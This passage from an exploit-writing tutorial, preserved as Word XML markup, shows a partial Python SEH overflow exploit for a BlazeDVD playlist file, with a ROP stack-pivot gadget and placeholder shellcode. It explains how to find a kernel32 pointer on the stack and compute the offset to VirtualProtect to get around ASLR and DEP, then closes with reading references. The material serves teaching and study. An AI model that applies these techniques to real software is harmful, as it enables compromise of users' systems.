      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Exploit code so far looks like this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#!/usr/bin/python</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junk = "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="7FEC7F"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>" * 612</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SEH - pivot the stack</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rop = 'xaex74x60x61' # 0x616074AE : # ADD ESP,408 # RETN 4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sc = "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="7FEC7F"/>
        </w:rPr>
        <w:t>B</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>" * 500</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 xml:space="preserve">buffer = junk + rop + sc </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file=open('rop.plf','w')</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:pBdr>
          <w:top w:val="single" w:sz="2" w:space="3" w:color="CECECE"/>
          <w:left w:val="single" w:sz="2" w:space="3" w:color="CECECE"/>
          <w:bottom w:val="single" w:sz="2" w:space="3" w:color="CECECE"/>
          <w:right w:val="single" w:sz="2" w:space="3" w:color="CECECE"/>
        </w:pBdr>
        <w:shd w:fill="808080" w:val="clear"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>file.write(buffer)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:pBdr>
          <w:top w:val="single" w:sz="2" w:space="3" w:color="CECECE"/>
          <w:left w:val="single" w:sz="2" w:space="3" w:color="CECECE"/>
          <w:bottom w:val="single" w:sz="2" w:space="3" w:color="CECECE"/>
          <w:right w:val="single" w:sz="2" w:space="3" w:color="CECECE"/>
        </w:pBdr>
        <w:shd w:fill="808080" w:val="clear"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>file.close()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The crash/exception is triggered because we have overwritten direct RET (with the "A"’s in the "junk" variable). (Which means that you may be able to build a direct RET variant for this sploit as well. Anyways, we already decided to use SEH).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>When we observe the stack when the SE Handler is called, right after the "ADD ESP,408" instruction is executed, we see this :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>1. We will land in the A’s before overwriting SEH. Using a metasploit pattern we discover that we land after 312 A’s in that buffer. That means that your first gadget pointer needs to be placed at that location. If you will be using a lot of pointers (and/or shellcode), you may have to think about the fact that the SEH pointer is placed at byte 612 in your buffer.)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3971925" cy="3676650"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="70" name="Image70" descr="">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0" descr="">
                      <a:hlinkClick r:id="rId187"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId186"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3971925" cy="3676650"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>2. Scroll down in the stack view. After the buffer (filled with A’s + our SEH handler + B’s) you should start to see pointers on the stack, indicating "RETURN to … from …" :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3314700" cy="1857375"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="71" name="Image71" descr="">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1" descr="">
                      <a:hlinkClick r:id="rId189"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId188"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3314700" cy="1857375"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>These are saved EIP’s – placed on the stack by functions that were called earlier.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>If you scroll almost all the way down, you will find a pointer to an address in kernel32 :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3343275" cy="2362200"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="72" name="Image72" descr="">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2" descr="">
                      <a:hlinkClick r:id="rId191"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId190"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3343275" cy="2362200"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The goal would be to set up a rop chain that would fetch that pointer, and add/sub an offset until it points at VirtualProtect.  The pointer we see on the stack, at 0x0012FF8C, is 0x7664D0E9.  In the current process/environment, kernel32.dll is loaded at 0x76600000.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4219575" cy="2228850"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="73" name="Image73" descr="">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3" descr="">
                      <a:hlinkClick r:id="rId193"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId192"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4219575" cy="2228850"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>VirtualProtect() is located at 0x76601DC3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4791075" cy="1971675"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="74" name="Image74" descr="">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4" descr="">
                      <a:hlinkClick r:id="rId195"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId194"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4791075" cy="1971675"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>That means that the VirtualProtect() function can be found at [kernel32_baseaddress + 0x1DC3] or, at [found_pointer – 0x4B326 bytes]. Remember this offset.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Reboot the machine and see if the pointer can still be found at the same location, and that the offset from the picked up pointer from the stack, to VirtualProtect() is still the same.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>After the reboot, kernel32.dll is loaded at 0x75590000. The function is (obviously) still at kernel32.baseaddress offset +0x1DC3 :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3228975" cy="3505200"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="75" name="Image75" descr="">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5" descr="">
                      <a:hlinkClick r:id="rId197"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId196"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3228975" cy="3505200"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>On the stack, the pointer at 0012FF8C is 755DD0E9.  If we subtract the offset (0x4B326 bytes) again, we end up at 75591DC3. And that’s VirtualProtect ! This means that we have found a reliable place to pick up a kernel32 pointer, and found a reliable offset to get to VirtualProtect().</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>How can we get this value from the stack into a register so we can use it to set up the API call ?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Well, a possible method would be :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">make a register point at the stack address (0x0012FF8C in this case). Let’s say you dynamically crafted this value into eax.   (0x6162A59E + 0x61630804, + chain of ADD EAX,xxx ) </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">use a gadget which would do something like this :  mov eax,[eax] + ret.   This would take the kernel32 pointer and put it into eax. (variations on this instruction will work too, of course – example : MOV EAX,DWORD PTR DS:[EAX+1C] – like the one at 0x6160103B) </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">subtract 0x4B326 bytes from the value picked up from the stack (basically apply the static offset…) and you’ll have a dynamic way to obtain the function pointer to VirtualProtect(), on Vista SP2, despite the fact that kernel32 is ASLR aware. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Quotations"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Note : finding return pointers on the stack is not that uncommon, so this may be a good approach to bypassing ASLR for kernel32 pointers.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>and that… would be a good exercise for you.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Good luck !</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Quotations"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="283"/>
        <w:ind w:left="567" w:right="567" w:hanging="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Update (June 17th) : mr_me posted his Win7 version of the DEP bypass exploit for BlazeDVD on </w:t>
      </w:r>
      <w:hyperlink r:id="rId198" w:tgtFrame="_blank">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
          </w:rPr>
          <w:t>exploit-db</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr/>
        <w:t>.  Despite the fact that the exploit is available, I would still suggest to try to build this one yourself (on Vista or Win7 – doesn’t matter… but hey, no cheating :D)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Other literature on DEP / Memory protection bypass </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:hyperlink r:id="rId199" w:tgtFrame="_blank">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
          </w:rPr>
          <w:t>You can’t stop us – CONFidence 2010 (Alexey Sintsov)</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:hyperlink r:id="rId200" w:tgtFrame="_blank">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
          </w:rPr>
          <w:t>Buffer overflow attacks bypassing DEP Part 1 (Marco Mastropaolo)</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:hyperlink r:id="rId201" w:tgtFrame="_blank">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
          </w:rPr>
          <w:t>Buffer overflow attacks bypassing DEP Part 2 (Marco Mastropaolo)</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:hyperlink r:id="rId202" w:tgtFrame="_blank">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
          </w:rPr>
          <w:t>Practical Rop (Dino Dai Zovi)</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:hyperlink r:id="rId203" w:tgtFrame="_blank">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
          </w:rPr>
          <w:t>Bypassing Browser Memory Protections (Alexander Sotirov &amp; Mark Down)</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:hyperlink r:id="rId204" w:tgtFrame="_blank">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
          </w:rPr>
          <w:t>Return-Oriented Programming (Hovav Shacham, Erik Buchanan, Ryan Roemer, Stefan Savage)</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:hyperlink r:id="rId205" w:tgtFrame="_blank">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
          </w:rPr>
          <w:t>Exploitation with WriteProcessMemory (Spencer Pratt)</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:hyperlink r:id="rId206" w:tgtFrame="_blank">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
          </w:rPr>
          <w:t>Exploitation techniques and mitigations on Windows (skape)</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:hyperlink r:id="rId207" w:tgtFrame="_blank">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
          </w:rPr>
          <w:t>Bypassing hardware enforced DEP (skape and skywing)</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:hyperlink r:id="rId208" w:tgtFrame="_blank">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
          </w:rPr>
          <w:t>A little return oriented exploitation on Windows x86 – Part 1 (Harmony Security – Stephen Fewer)</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
